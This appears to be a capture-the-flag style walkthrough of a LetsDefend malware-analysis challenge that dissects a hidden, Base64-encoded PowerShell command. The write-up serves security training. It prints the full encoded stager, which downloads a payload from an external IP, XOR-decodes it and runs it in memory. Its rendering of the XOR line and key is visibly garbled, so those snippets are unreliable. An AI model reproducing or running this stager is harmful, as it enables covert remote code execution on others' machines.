Back to Walkthroughs
PowerShell Script
Let's Defend Malware Analysis [Easy]Easy

PowerShell Script

#tutorial

Challenge Description

image image

Solution and Analysis

We have the following powershell code in the malware

powershell.exe -NoP -sta -NonI -W Hidden -Enc
JABXAEMAPQBOAGUAdwAtAE8AYgBqAEUAYwBUACAAUwB5AFMAVABlAE0ALgBOAEUAVAAuAFcAZQBiAEMAbABpAEUATgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBDAC4ASABlAEEARABlAFIAUwAuAEEARABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAVwBjAC4AUAByAG8AeABZACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAVAAuAFcARQBCAFIAZQBRAFUARQBzAHQAXQA6ADoARABFAEYAQQB1AEwAdABXAGUAYgBQAHIAbwBYAHkAOwAkAHcAYwAuAFAAUgBPAHgAWQAuAEMAcgBFAGQAZQBuAFQAaQBhAGwAUwAgAD0AIABbAFMAeQBzAFQAZQBtAC4ATgBFAHQALgBDAFIAZQBkAGUATgBUAEkAQQBsAEMAQQBjAEgARQBdADoAOgBEAGUARgBBAFUATABUAE4AZQB0AFcATwByAEsAQwByAGUAZABFAE4AVABpAEEAbABzADsAJABLAD0AJwBJAE0ALQBTACYAZgBBADkAWAB1AHsAWwApAHwAdwBkAFcASgBoAEMAKwAhAE4AfgB2AHEAXwAxADIATAB0AHkAJwA7ACQAaQA9ADAAOwBbAEMASABhAFIAWwBdAF0AJABCAD0AKABbAGMASABhAFIAWwBdAF0AKAAkAHcAYwAuAEQATwB3AE4ATABPAGEARABTAHQAcgBpAE4AZwAoACIAaAB0AHQAcAA6AC8ALwA5ADgALgAxADAAMwAuADEAMAAzAC4AMQA3ADAAOgA3ADQANAAzAC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF8ALQBCAFgAbwBSACQASwBbACQASQArACsAJQAkAGsALgBMAEUAbgBHAFQASABdAH0AOwBJAEUAWAAgACgAJABCAC0AagBPAEkAbgAnACcAKQA=

The command line powershell.exe -NoP -sta -NonI -W Hidden -Enc is a method for executing a PowerShell script in a stealthy, non-interactive, and obfuscated manner. It is a common pattern used by both system administrators for legitimate automation and by attackers for malicious purposes.

1. powershell.exe

This launches the PowerShell executable.
It allows execution of PowerShell scripts and commands.

2. -NoP (No Profile)

  • Prevents PowerShell from loading the user’s profile scripts.
  • Used to avoid detection or speed up execution.
  • Skips custom startup scripts (like profile.ps1).

3. -sta (Single Threaded Apartment)

  • Runs PowerShell in a Single-Threaded Apartment mode.
  • This is often required for certain GUI components (like COM objects).

4. -NonI (Non-Interactive)

  • Starts PowerShell in non-interactive mode.
  • User cannot type input directly — only automated/scripted commands are executed.

5. -W Hidden (WindowStyle Hidden)

  • Runs the PowerShell window hidden from the user.
  • Prevents a visible PowerShell console from appearing.

6. -Enc (EncodedCommand)

  • Specifies that the following string is a Base64-encoded command.
  • Used to obfuscate the actual script being run.
  • Example: -Enc SQBmACgAMQArADEAKQA... → Decodes to readable PowerShell code.

To decode the obfuscated malware, just copy the entire line of code and paste it CyberChef and follow the instructions to get the readable code

image

Malware Behavior Analysis

The provided PowerShell script is a malicious script that performs the following actions:

WebClient Initialization: The script creates a WebClient object with the line $wc = new-object system.net.webclient;. This object is used to make HTTP requests, enabling the script to interact with external servers, likely to download additional payloads or data.

User Agent Spoofing: It sets a spoofed user agent string, $u = 'mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; rv:11.0) like gecko';, which mimics Internet Explorer 11 on Windows 7. This is added to HTTP headers via $wc.headers.add('user-agent', $u); to make requests appear legitimate and evade detection.

Proxy Configuration: The script configures the WebClient to use the system's default proxy settings with $wc.proxy = [system.net.webrequest]::defaultwebproxy; and sets default network credentials for proxy authentication using $wc.proxy.credentials = [system.net.credentialcache]::defaultnetworkcredentials;. This ensures the script can operate through a proxy if present.

Payload Obfuscation and Execution: The script uses XOR encoding to obfuscate its payload. A key is defined as $k = 'im-s&fa9xu{[)|wdwjhc+!n~vq_12lty';, and the payload is decoded using the operation b = (char[])|% { −bxor−bxor k[ i++i++ k.length] };. The decoded payload is then executed as a PowerShell command with iex ($b -join ''). This likely contains the core malicious functionality, such as downloading and executing a payload, establishing persistence, or performing data exfiltration.

Potential Behavior: The script's structure suggests it is designed to:

  • Download a malicious payload from a remote server using the WebClient.

  • Execute the downloaded payload or additional commands hidden in the XOR-decoded string.

  • Operate covertly by mimicking legitimate browser traffic and handling proxy authentication.

Use this to answer all the questions, the answers for which are located in the decoded powershell script itself.